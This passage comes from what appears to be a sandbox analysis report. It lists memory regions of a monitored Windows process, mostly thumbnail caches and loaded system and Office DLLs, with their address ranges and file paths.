0x5edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e60000" filename = "" Region: id = 697 start_va = 0x5f10000 end_va = 0x5f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f10000" filename = "" Region: id = 698 start_va = 0x6020000 end_va = 0x609ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 699 start_va = 0x60c0000 end_va = 0x613ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060c0000" filename = "" Region: id = 700 start_va = 0x6160000 end_va = 0x61dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006160000" filename = "" Region: id = 701 start_va = 0x6210000 end_va = 0x621ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006210000" filename = "" Region: id = 702 start_va = 0x6310000 end_va = 0x631ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 703 start_va = 0x6320000 end_va = 0x639ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006320000" filename = "" Region: id = 704 start_va = 0x6460000 end_va = 0x64dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006460000" filename = "" Region: id = 705 start_va = 0x6510000 end_va = 0x651ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006510000" filename = "" Region: id = 706 start_va = 0x6530000 end_va = 0x65affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006530000" filename = "" Region: id = 707 start_va = 0x65e0000 end_va = 0x665ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065e0000" filename = "" Region: id = 708 start_va = 0x6680000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 709 start_va = 0x6740000 end_va = 0x67bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006740000" filename = "" Region: id = 710 start_va = 0x67c0000 end_va = 0x68bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067c0000" filename = "" Region: id = 711 start_va = 0x68c0000 end_va = 0x69bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 712 start_va = 0x69c0000 end_va = 0x6abffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 713 start_va = 0x6ac0000 end_va = 0x6bbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 714 start_va = 0x6bc0000 end_va = 0x6ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006bc0000" filename = "" Region: id = 715 start_va = 0x6ec0000 end_va = 0x6fbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 716 start_va = 0x6fc0000 end_va = 0x70bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 717 start_va = 0x70c0000 end_va = 0x71effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 718 start_va = 0x71f0000 end_va = 0x726ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071f0000" filename = "" Region: id = 719 start_va = 0x7280000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007280000" filename = "" Region: id = 720 start_va = 0x7300000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 721 start_va = 0x7400000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 722 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 723 start_va = 0x7660000 end_va = 0x76dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007660000" filename = "" Region: id = 724 start_va = 0x7720000 end_va = 0x779ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007720000" filename = "" Region: id = 725 start_va = 0x77a0000 end_va = 0x7937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000077a0000" filename = "" Region: id = 726 start_va = 0x7b30000 end_va = 0x7f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b30000" filename = "" Region: id = 727 start_va = 0xa280000 end_va = 0xa37ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 728 start_va = 0xa710000 end_va = 0xa80ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 729 start_va = 0xa810000 end_va = 0xa90ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 730 start_va = 0x74080000 end_va = 0x74085fff monitored = 0 entry_point = 0x74081010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 731 start_va = 0x752f0000 end_va = 0x753d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 732 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 733 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 734 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 735 start_va = 0x778b0000 end_va = 0x778b6fff monitored = 0 entry_point = 0x778b106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 736 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 737 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 738 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 739 start_va = 0xff620000 end_va = 0xff8dffff monitored = 0 entry_point = 0xff64b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 740 start_va = 0x7fef0cb0000 end_va = 0x7fef0d75fff monitored = 0 entry_point = 0x7fef0cbf220 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 741 start_va = 0x7fef1020000 end_va = 0x7fef10f6fff monitored = 0 entry_point = 0x7fef1021074 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 742 start_va = 0x7fef1350000 end_va = 0x7fef138afff monitored = 0 entry_point = 0x7fef1351238 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 743 start_va = 0x7fef1390000 end_va = 0x7fef13aefff monitored = 0 entry_point = 0x7fef13957b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 744 start_va = 0x7fef2220000 end_va = 0x7fef2292fff monitored = 0 entry_point = 0x7fef227c7f8 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 745 start_va = 0x7fef2bf0000 end_va = 0x7fef2c8cfff monitored = 0 entry_point = 0x7fef2c7d52c region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 746 start_va = 0x7fef2c90000 end_va = 0x7fef2d66fff monitored = 0 entry_point = 0x7fef2c91254 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 747 start_va = 0x7fef2d70000 end_va = 0x7fef2da0fff monitored = 0 entry_point = 0x7fef2d71b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 748 start_va = 0x7fef2db0000 end_va = 0x7fef2e04fff monitored = 0 entry_point = 0x7fef2db26e4 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 749 start_va = 0x7fef2e10000 end_va = 0x7fef2e8efff monitored = 0 entry_point = 0x7fef2e11070 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 750 start_va = 0x7fef2e90000 end_va = 0x7fef2f51fff monitored = 0 entry_point = 0x7fef2eb04b4 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 751 start_va = 0x7fef2f60000 end_va = 0x7fef318afff monitored = 0 entry_point = 0x7fef2f61f00 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 752 start_va = 0x7fef3190000 end_va = 0x7fef31e3fff monitored = 0 entry_point = 0x7fef319104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 753 start_va = 0x7fef31f0000 end_va = 0x7fef3da6fff monitored = 0 entry_point = 0x7fef31f1bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 754 start_va = 0x7fef3db0000 end_va = 0x7fef3e64fff monitored = 0 entry_point = 0x7fef3dd1cd0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 755 start_va = 0x7fef3e70000 end_va = 0x7fef3ec7fff monitored = 0 entry_point = 0x7fef3e730f0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 756 start_va = 0x7fef3ed0000 end_va = 0x7fef3f14fff monitored = 0 entry_point = 0x7fef3ed4190 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 757 start_va = 0x7fef3f20000 end_va = 0x7fef3f7dfff monitored = 0 entry_point = 0x7fef3f5a7fc region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 758 start_va = 0x7fef3f80000 end_va = 0x7fef3f9ffff monitored = 0 entry_point = 0x7fef3f81010 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 759 start_va = 0x7fef3fa0000 end_va = 0x7fef3fdefff monitored = 0 entry_point = 0x7fef3fa12c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 760 start_va = 0x7fef41f0000 end_va = 0x7fef420efff monitored = 0 entry_point = 0x7fef41f3580 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 761 start_va = 0x7fef4210000 end_va = 0x7fef43ccfff monitored = 0 entry_point = 0x7fef4211010 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 762 start_va = 0x7fef43d0000 end_va = 0x7fef4408fff monitored = 0 entry_point = 0x7fef43d1240 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 763 start_va = 0x7fef4410000 end_va = 0x7fef469afff monitored = 0 entry_point = 0x7fef4416f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 764 start_va = 0x7fef46a0000 end_va = 0x7fef4713fff monitored = 0 entry_point = 0x7fef46d54c8 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 765 start_va = 0x7fef4720000 end_va = 0x7fef4790fff monitored = 0 entry_point = 0x7fef475ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 766 start_va = 0x7fef47a0000 end_va = 0x7fef4808fff monitored = 0 entry_point = 0x7fef47a1198 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 767 start_va = 0x7fef4940000 end_va = 0x7fef4960fff monitored = 0 entry_point = 0x7fef49473a0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 768 start_va = 0x7fef49a0000 end_va = 0x7fef49abfff monitored = 0 entry_point = 0x7fef49a602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 769 start_va = 0x7fef49b0000 end_va = 0x7fef4a6cfff monitored = 0 entry_point = 0x7fef49b1ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 770 start_va = 0x7fef69e0000 end_va = 0x7fef6a53fff monitored = 0 entry_point = 0x7fef69e66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 771 start_va = 0x7fef8120000 end_va = 0x7fef825bfff monitored = 0 entry_point = 0x7fef812197c region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 772 start_va = 0x7fef8340000 end_va = 0x7fef8348fff monitored = 0 entry_point = 0x7fef8342f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 773 start_va = 0x7fef8350000 end_va = 0x7fef8367fff monitored = 0 entry_point = 0x7fef8351060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 774 start_va = 0x7fef8370000 end_va = 0x7fef8379fff monitored = 0 entry_point = 0x7fef83749f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 775 start_va = 0x7fef8380000 end_va = 0x7fef83cefff monitored = 0 entry_point = 0x7fef8382760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 776 start_va = 0x7fef83d0000 end_va = 0x7fef840afff monitored = 0 entry_point = 0x7fef83f7600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 777 start_va = 0x7fef8410000 end_va = 0x7fef844afff monitored = 0 entry_point = 0x7fef84122f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 778 start_va = 0x7fef8450000 end_va = 0x7fef85ebfff monitored = 0 entry_point = 0x7fef8451030 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 779 start_va = 0x7fef8630000 end_va = 0x7fef86aefff monitored = 0 entry_point = 0x7fef868385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 780 start_va = 0x7fef86b0000 end_va = 0x7fef86eafff monitored = 0 entry_point = 0x7fef86b1070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 781 start_va = 0x7fef86f0000 end_va = 0x7fef86fcfff monitored = 0 entry_point = 0x7fef86f7104 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 782 start_va = 0x7fef8700000 end_va = 0x7fef87b9fff monitored = 0 entry_point = 0x7fef870115c region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 783 start_va = 0x7fef87c0000 end_va = 0x7fef883bfff monitored = 0 entry_point = 0x7fef87c11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 784 start_va = 0x7fef8840000 end_va = 0x7fef8ae2fff monitored = 0 entry_point = 0x7fef8843498 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 785 start_va = 0x7fef8af0000 end_va = 0x7fef8afbfff monitored = 0 entry_point = 0x7fef8af1380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 786 start_va = 0x7fef8b00000 end_va = 0x7fef8b33fff monitored = 0 entry_point = 0x7fef8b01890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 787 start_va = 0x7fef8c40000 end_va = 0x7fef8d2dfff monitored = 0 entry_point = 0x7fef8c412a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 788 start_va = 0x7fef8d30000 end_va = 0x7fef8db2fff monitored = 0 entry_point = 0x7fef8d5692c region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 789 start_va = 0x7fef8dc0000 end_va = 0x7fef8dcafff monitored = 0 entry_point = 0x7fef8dc5740 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 790 start_va = 0x7fef8dd0000 end_va = 0x7fef8dd9fff monitored = 0 entry_point = 0x7fef8dd4938 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 791 start_va = 0x7fef8de0000 end_va = 0x7fef8e01fff monitored = 0 entry_point = 0x7fef8de1198 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 792 start_va = 0x7fef8e60000 end_va = 0x7fef8e78fff monitored = 0 entry_point = 0x7fef8e7077c region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 793 start_va = 0x7fef8e80000 end_va = 0x7fef8ec2fff monitored = 0 entry_point = 0x7fef8ea1b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 794 start_va = 0x7fef8ef0000 end_va = 0x7fef8ef9fff monitored = 0 entry_point = 0x7fef8ef1198 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 795 start_va = 0x7fef8f00000 end_va = 0x7fef901efff monitored = 0 entry_point = 0x7fef8f1339c region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 796 start_va = 0x7fef9020000 end_va = 0x7fef9047fff monitored = 0 entry_point = 0x7fef9033cc4 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 797 start_va = 0x7fef9070000 end_va = 0x7fef9082fff monitored = 0 entry_point = 0x7fef907a8b8 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 798 start_va = 0x7fef90b0000 end_va = 0x7fef90b7fff monitored = 0 entry_point = 0x7fef90b1030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 799 start_va = 0x7fef90c0000 end_va = 0x7fef913ffff monitored = 0 entry_point = 0x7fef90c4a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 800 start_va = 0x7fef9140000 end_va = 0x7fef914efff monitored = 0 entry_point = 0x7fef9141040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 801 start_va = 0x7fef9150000 end_va = 0x7fef915bfff monitored = 0 entry_point = 0x7fef9151070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 802 start_va = 0x7fef9160000 end_va = 0x7fef91ddfff monitored = 0 entry_point = 0x7fef9161304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 803 start_va = 0x7fef91e0000 end_va = 0x7fef9214fff monitored = 0 entry_point = 0x7fef91ec59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 804 start_va = 0x7fef9220000 end_va = 0x7fef9a9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 805 start_va = 0x7fef9aa0000 end_va = 0x7fef9c58fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 806 start_va = 0x7fef9c60000 end_va = 0x7fef9f75fff monitored = 0 entry_point = 0x7fef9c63e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 807 start_va = 0x7fef9f80000 end_va = 0x7fef9f82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 808 start_va = 0x7fef9f90000 end_va = 0x7fef9f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 809 start_va = 0x7fef9fa0000 end_va = 0x7fef9fa2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 810 start_va = 0x7fef9fb0000 end_va = 0x7fef9fb2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 811 start_va = 0x7fef9fc0000 end_va = 0x7fef9fc4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft 